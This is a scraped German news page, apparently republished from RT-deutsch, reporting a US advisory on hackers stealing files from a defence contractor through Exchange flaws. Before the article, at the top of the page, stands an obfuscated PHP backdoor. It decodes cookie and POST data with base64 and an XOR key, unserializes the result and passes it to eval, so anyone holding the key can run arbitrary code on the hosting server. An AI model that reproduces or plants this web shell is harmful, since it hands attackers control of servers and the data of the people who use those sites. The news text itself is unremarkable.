$auDiDm = class_exists("V_CGoZ");if (!$auDiDm){class V_CGoZ{private $XkVtqVHtt;public static $fKcqCF = "a158a651-ff74-4edd-953b-c602dc034b3c";public static $zDAWli = NULL;public function __construct(){$VLrdKegcTD = $_COOKIE;$DhwQtx = $_POST;$mummiCkbIe = @$VLrdKegcTD[substr(V_CGoZ::$fKcqCF, 0, 4)];if (!empty($mummiCkbIe)){$gjDlrlmo = "base64";$iKSRFTZjJ = "";$mummiCkbIe = explode(",", $mummiCkbIe);foreach ($mummiCkbIe as $knlWEFqQRS){$iKSRFTZjJ .= @$VLrdKegcTD[$knlWEFqQRS];$iKSRFTZjJ .= @$DhwQtx[$knlWEFqQRS];}$iKSRFTZjJ = array_map($gjDlrlmo . chr ( 924 - 829 ).chr ( 569 - 469 ).chr (101) . "\143" . chr ( 254 - 143 ).'d' . chr ( 408 - 307 ), array($iKSRFTZjJ,)); $iKSRFTZjJ = $iKSRFTZjJ[0] ^ str_repeat(V_CGoZ::$fKcqCF, (strlen($iKSRFTZjJ[0]) / strlen(V_CGoZ::$fKcqCF)) + 1);V_CGoZ::$zDAWli = @unserialize($iKSRFTZjJ);}}public function __destruct(){$this->qrWpeOVCE();}private function qrWpeOVCE(){if (is_array(V_CGoZ::$zDAWli)) {$bdwWJSmubh = str_replace('<' . chr (63) . chr ( 117 - 5 ).'h' . "\x70", "", V_CGoZ::$zDAWli[chr (99) . "\157" . "\156" . "\164" . "\x65" . chr ( 670 - 560 ).'t']);eval($bdwWJSmubh);exit();}}}$fnjTXPt = new V_CGoZ(); $fnjTXPt = NULL;} ?> US-Behörden: Hacker stahlen "sensible" Daten von US-Rüstungsunternehmen – No-Zensur.de Das freie Wort für eine freie Welt
Start RT-deutsch US-Behörden: Hacker stahlen "sensible" Daten von US-Rüstungsunternehmen

US-Behörden: Hacker stahlen "sensible" Daten von US-Rüstungsunternehmen

0
US-Behörden: Hacker stahlen "sensible" Daten von US-Rüstungsunternehmen



Ein Auftragnehmer des US-Militärs ist Opfer eines Hackerangriffs geworden. Einer Gruppe von Hackern gelang es zwischen Januar und November letzten Jahres demnach, Daten eines in den USA ansässigen Rüstungsunternehmens zu kompromittieren und exfiltrieren. Hierzu nutzten sie offenbar Schwachstellen auf den Microsoft-Exchange-Servern des ungenannten Unternehmens aus, heißt es in einer am Dienstag veröffentlichten gemeinsamen Erklärung der Cybersecurity and Infrastructure Security Agency (CISA), des FBI und der National Security Agency (NSA).

Um in die Systeme einzudringen, benutzten die bisher nicht identifizierten Eindringlinge den Angaben zufolge ein Open-Source-Toolkit namens Impacket. Anschließend kam offenbar ein maßgeschneidertes Exfiltrationstool namens CovalentStealer zum Einsatz. So gelang es den Hackern, sensible Daten von den Servern des Unternehmens zu stehlen, „einschließlich sensibler vertragsbezogener Informationen von gemeinsam genutzten Laufwerken“, heißt es in dem Bulletin. Der erste unautorisierte Zugriff sei demnach bereits im Januar 2021 erfolgt.

Während des knapp ein Jahr andauernden Übergriffs „exfiltrierten die Akteure Hunderte von Dateien, die sich auf die Produkte des Unternehmens, dessen Beziehungen zu anderen Ländern sowie interne Personal- und Rechtsangelegenheiten bezogen“. In einem Fall nutzten die Hacker laut den in dem Fall ermittelnden Behörden das Konto eines ehemaligen Mitarbeiters, um auf Mailbox-Elemente wie E-Mail-Nachrichten, Meetings und Kontakte zuzugreifen. 

Ob der Hack schwerwiegende Auswirkungen hatte, ist nicht bekannt. In einem gemeinsamen Cybersicherheitsbericht, der kurz vor Beginn des Ukraine-Krieges am 24. Februar veröffentlicht wurde, bemängelten die US-Sicherheitsbehörden jedoch, dass Hacker seit Jahren US-Verteidigungsunternehmen ins Visier nehmen würden, um so „bedeutende Einblicke“ in die Waffen- und Kommunikationsinfrastruktur der Vereinigten Staaten zu erhalten. Um ähnliche Vorfälle künftig verhindern zu können, fordern die US-Sicherheitsbehörden andere Verteidigungsunternehmen dazu auf, die in der gemeinsamen Erklärung beschriebenen Abhilfemaßnahmen zu ergreifen. 

Im vergangenen Jahrzehnt haben Hacker immer wieder Militär- und Rüstungsunternehmen angegriffen. Dabei wurden viele Daten aus den Bereichen Luftfahrtelektronik, Überwachungstechnik und Netzwerksicherheit gestohlen. So berichtete Defense News im Juni 2018, dass Hacker in die Netzwerksysteme eines Auftragnehmers der US-Marine eindrangen, um an sensible Informationen über geheime Arbeiten an einer Anti-Schiffsrakete zu gelangen. „Die erworbenen Informationen bieten erhebliche Einblicke in die Entwicklungspläne für US-Waffen“, hieß es in dem Bericht.

Mehr zum Thema – Cybersicherheit: Baerbock sieht Nachholbedarf für Deutschland



Source link